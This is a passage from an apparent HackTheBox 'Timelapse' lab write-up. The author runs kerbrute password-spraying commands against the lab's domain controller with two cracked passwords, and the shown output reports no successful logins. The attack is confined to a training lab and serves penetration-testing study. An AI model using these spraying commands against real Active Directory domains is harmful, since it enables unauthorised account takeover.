Password Spraying Attack
Leveraging the [[Timelapse_RID_Cycling#[RID Cycling](https //www.trustedsec.com/blog/new-tool-release-rpc_enum-rid-cycling-attack/)|domain users]] discovered through the RID Cycling attack and both the cracked archive password and PFX password, I can attempt to perform password spraying attack to check for password reuse
┌──(kali㉿kali)-[~/archive/htb/labs/timelapse]
└─$ kerbrute passwordspray --dc dc01.timelapse.htb -d TIMELAPSE.HTB ./users.txt 'supremelegacy'
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
version: v1.0.3 (9dad6e1) - 10/24/23 - Ronnie Flathers @ropnop
2023/10/24 20:51:40 > Using KDC(s):
2023/10/24 20:51:40 > dc01.timelapse.htb:88
2023/10/24 20:51:41 > Done! Tested 13 logins (0 successes) in 0.906 seconds
┌──(kali㉿kali)-[~/archive/htb/labs/timelapse]
└─$ kerbrute passwordspray --dc dc01.timelapse.htb -d TIMELAPSE.HTB ./users.txt 'thuglegacy'
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
version: v1.0.3 (9dad6e1) - 10/24/23 - Ronnie Flathers @ropnop
2023/10/24 20:51:49 > Using KDC(s):
2023/10/24 20:51:49 > dc01.timelapse.htb:88
2023/10/24 20:51:50 > Done! Tested 13 logins (0 successes) in 0.994 secondsBoth supremelegacy and thuglegacy failed to authenticate for all 13 known domain users